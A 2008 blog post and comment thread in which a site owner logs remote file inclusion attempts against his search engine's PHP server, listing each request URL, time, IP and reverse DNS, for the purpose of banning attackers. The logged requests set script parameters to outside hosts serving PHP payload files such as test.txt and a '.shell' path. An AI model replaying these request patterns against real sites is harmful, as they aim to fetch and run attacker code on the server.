Banning IP from spammers
February 17, 2008
We’ve started to get tough on spammers and the likes, anyone who requests something from our server they should not, will be banned by IP address.
We’ll also be recording the IP and RDNS in this post to hopefully gather some useful information that can be of help in the future.
Request: http://www.clickfind.com.au:80/main.php?other=http://www.fgwarez.com/bbs/skin/ting_music/…/usa??
Date Time: Feb 16, 2008 10:47 PM
Remote Address: 205.234.130.198
Reverse DNS: server.ingenieroweb.net
Request: http://www.clickfind.com.au:80/modules/coppermine/themes/default/theme.php?THEME_DIR=http://smolen.org/test.txt???
Date Time: Feb 16, 2008 9:49 PM
Remote Address: 209.126.142.130
Reverse DNS: dish4.net.ibizdns.com
Entry Filed under: Other. .
10 Comments Add your own
Leave a Comment
Some HTML allowed:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <pre> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
Trackback this post | Subscribe to the comments via RSS Feed
Australian Search Engine
websitedesignaustralia
Taco Fleur
kyliewrites
cazazz
Jim Petrakis
1.
Australian Search Engine | February 17, 2008 at 11:29 pm
Request: http://www.clickfind.com.au:80/order.php?pag=http://www.cartographia.org/ftp/files/source/SinG??
Date Time: Feb 16, 2008 2:32 PM
Remote Address: 72.55.143.196
Reverse DNS: ip-72-55-143-196.static.privatedns.com
2.
Australian Search Engine | February 24, 2008 at 1:26 am
Request: http://www.clickfind.com.au:80/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt???
Date Time: Feb 23, 2008 7:33 PM
Remote Address: 61.14.187.140
Reverse DNS: Meteor.websiteactive.com
3.
Australian Search Engine | February 24, 2008 at 1:27 am
Request: http://www.clickfind.com.au:80/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/durhaka/cmdasca.txt?????
Date Time: Feb 23, 2008 8:12 PM
Remote Address: 61.19.38.155
Reverse DNS: 61.19.38.155
4.
Australian Search Engine | February 24, 2008 at 1:27 am
Request: http://www.clickfind.com.au:80/pivot/modules/module_db.php?pivot_path=http://smolen.org/test.txt???
Date Time: Feb 23, 2008 4:44 PM
Remote Address: 85.25.144.182
Reverse DNS: golf529.server4you.de
5.
Australian Search Engine | February 28, 2008 at 1:49 am
Request; http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.eshqs.com/error.txt???
Date Time: Feb 27, 2008 6:02 PM
Remote Address: 204.15.224.50
Reverse DNS: mail.wives-in-need.com
6.
Australian Search Engine | February 29, 2008 at 3:33 am
Request; http://www.clickfind.com.au:80/2007/cgi-bin/awstats.pl?output=notfounderror/modules/vwar/admin/admin.php?vwar_root=http://keesenmirjam.nl/media/mic22_mod.txt?
Date Time: Feb 28, 2008 9:41 PM
Remote Address: 72.232.118.237
Reverse DNS: 237.118.232.72.static.reverse.ltdomains.com
Request; http://www.clickfind.com.au:80/main.php?pageURL=http://www.citoyennete-active.org/mambots/content/test.txt???
Date Time: Feb 28, 2008 5:24 PM
Remote Address: 203.88.114.169
Reverse DNS: AT-HP7KQ1S.rtds.aussiehq.net.au
Request; http://www.clickfind.com.au:80/main.php?s=http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????
Date Time: Feb 28, 2008 4:13 PM
Remote Address: 69.72.221.130
Reverse DNS: pyar.jaanhost.com
7.
Australian Search Engine | March 1, 2008 at 9:18 pm
Request: http://www.clickfind.com.au:80/gb/form.inc.php3?lang=http://smolen.org/test.txt???
Date Time: Feb 29, 2008 9:58 PM
Remote Address: 89.174.96.241
Reverse DNS: p23.progreso.pl
http://smolen.org/test.txt??? is a php file that they hope gets executed on the server.
Same as http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????
We’ve emailed some of these websites telling them about the file on their server, and to proof its not them who uploaded the file. They can do this by providing the FTP or HTTP log file to us.
8.
Australian Search Engine | March 1, 2008 at 9:19 pm
echo “UNITED ALBANIANS aka ALBOSS PARADISE”; in one of the text files tells me that the hackers are from Albania.
9.
Australian Search Engine | March 3, 2008 at 2:51 am
Request: http://www.clickfind.com.au:80/board/index.php
Referer: http://www.clickfind.com.au/board/index.php
Date Time: Mar 2, 2008 11:16 PM
Remote Address: 211.52.153.134
Reverse DNS: d074.dhcp212-198-114.noos.fr
10.
Australian Search Engine | March 3, 2008 at 3:02 am
Request: http://www.clickfind.com.au:80/board/index.php
Referer: http://www.clickfind.com.au/board/index.php
Date Time: Mar 2, 2008 11:14 PM
Remote Address: 61.35.100.131
Request: http://www.clickfind.com.au:80/phpbb2/index.php
Referer: http://www.clickfind.com.au/phpbb2/index.php
Date Time: Mar 2, 2008 11:13 PM
Remote Address: 218.57.11.112
Reverse DNS: 218.57.11.112
Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt?
Date Time: Mar 2, 2008 11:37 AM
Remote Address: 61.47.60.169
Reverse DNS: dns1.internetthailand.net
Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.techbomb.com/fastmicrowave/coges.txt??
Date Time: Mar 2, 2008 11:26 AM
Remote Address: 217.197.68.66
Reverse DNS: ip-217-197-68-66.punkt.pl
Request: http://www.clickfind.com.au:80/2007/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://216.191.16.12/.shell/site/iyes.txt??
Date Time: Mar 2, 2008 2:47 AM
Remote Address: 69.13.187.96
Reverse DNS: exceptionalhosting.propagation.net
Request: http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.ar-vision.com/z.txt?????
Date Time: Mar 1, 2008 11:47 PM
Remote Address: 216.127.86.119
Reverse DNS: ev1s-216-127-86-119.ev1servers.net